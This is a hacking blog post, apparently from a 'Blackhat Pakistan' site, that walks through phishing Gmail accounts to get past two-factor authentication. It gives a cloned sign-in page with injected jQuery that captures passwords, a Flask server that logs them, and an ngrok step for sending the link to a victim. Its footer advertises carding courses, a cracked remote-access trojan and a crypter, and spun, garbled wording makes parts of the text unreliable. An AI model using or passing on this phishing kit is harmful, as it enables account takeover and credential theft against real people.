Table of Contents
REQUIREMENTS
- STEP 1:
- STEP 2:
- STEP 3:
- STEP 4:
- STEP 5:
- NOTE:
- STEP 6:
- STEP 7:
How to Bypass Gmail 2FA; At first we ought to know almost a few essentials of phishing assault, It is the base techinque we utilize here to pick up secret word of victim.

REQUIREMENTS
- KALI LINUX
- SUBLIME Content EDITOR
- NGROK
STEP 1:
Initially utilize your browser and look for google sign in.
STEP 2:
Type the mail id you wanna hack, after entering the mail id and tap another.

STEP 3:
After entering the mail id and right press the mouse and tap review.

STEP 4:
after clicking review component ,go to reviewer tab or component tab and right press and press the alternative called Alter AS HTML,copy all html codes HOW TO BYPASS GMAIL 2FA.

STEP 5:
paste it on radiant content editor and include a few script at the conclusion of the html tag.

ill drop the code here:
<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>
<script>
$('button').click(function(e){
e.preventDefault()
auth=$('input[type=password]').val()
$.post(
"http://localhost:5000/auth",
{"password":auth},
function(data, status){
window.location="http://localhost:5000/login"
}
);
return false;
})
</script>
</html>
Save this file as login.html
NOTE:
Do it same for 2 calculate verification page
STEP 6:
next we require to type in a python code that bring deets from casualty. And spare it as app.py
ill allow the code below
app.py
#!/usr/bin/env python3
from flask import Flask, render_template, send_file, make_response, request
app = Flask(__name__)
@app.route(“/auth”, methods=[“POST”])
def auth():
print(request.form.to_dict())
return “ok”
@app.route(“/”)
def index():
response = make_response(send_file(“templates/login.html”))
response.headers.add(“Access-Control-Allow-Origin”, “*”)
return response
@app.route(“/login”)
def login():
return send_file(“templates/2fa.html”)
if __name__ == “__main__”:
app.run()
STEP 7:
open terminal in linux and sort as i did and arrange the ngrok

ngrok command

STEP 8:
And send the link in mail to victim, BOOM…….!!!! you have got a password.
More Hacking Courses are coming soon in Urdu/Hindi Languages Soon as possible for now you can check out our website carding Methods Blackhat Pakistan and our YouTube channel Blackhat Pakistan. carding And Spamming full course in Urdu/Hindi
Also Checkout our website Grayhatempire.com for more tools. if you want to Download CraxsRat 7.4 Cracked then check here. For Requesting New Program Request us on Grayhatempire Telegram.
Also Don,t forget to Visit Blackhat Pakistan. Also Checkout Hap Crypter Cracked.